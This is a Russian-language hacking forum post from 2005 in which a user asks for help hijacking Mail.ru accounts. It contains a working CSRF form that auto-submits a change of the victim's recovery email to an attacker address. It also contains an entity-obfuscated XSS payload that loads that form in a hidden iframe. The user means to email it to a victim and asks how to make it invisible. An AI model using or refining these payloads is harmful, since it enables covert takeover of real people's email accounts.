ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите разобраться с методом описанным на этом сайте
  #1  
Старый 21.05.2005, 16:58
Аватар для BARMALEY
BARMALEY
Новичок
Регистрация: 20.05.2005
Сообщений: 10
Провел на форуме:
0

Репутация: 0
Question Помогите разобраться с методом описанным на этом сайте

Здравствуйте!
Помогите разобраться со взломом майл.ру описанным в этой статье http://antichat.ru/txt/hmail/ !!!
Сделал я HTML:

<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="hacker@antichat.ru">
<input type="hidden" value="Сохранить" name="Save">
</form>
<script>
document.anketa.submit();
</script>


Выложил его на сервак,потом кидаем мудаку этот скрипт:


<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx'). innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://адрес документа/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>

Когда отсылаю письмо то вместо ('xxx') в письме появляется ('xxx Как с этим бороться???И как сделать что бы адресат не видел этого скрипта??? И для чего нужен этот URL:http://win.mail.ru/cgi-bin/anketa?pa...er@antichat.ru.
Зарание благодарен за ответы грамотных людей!!!
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ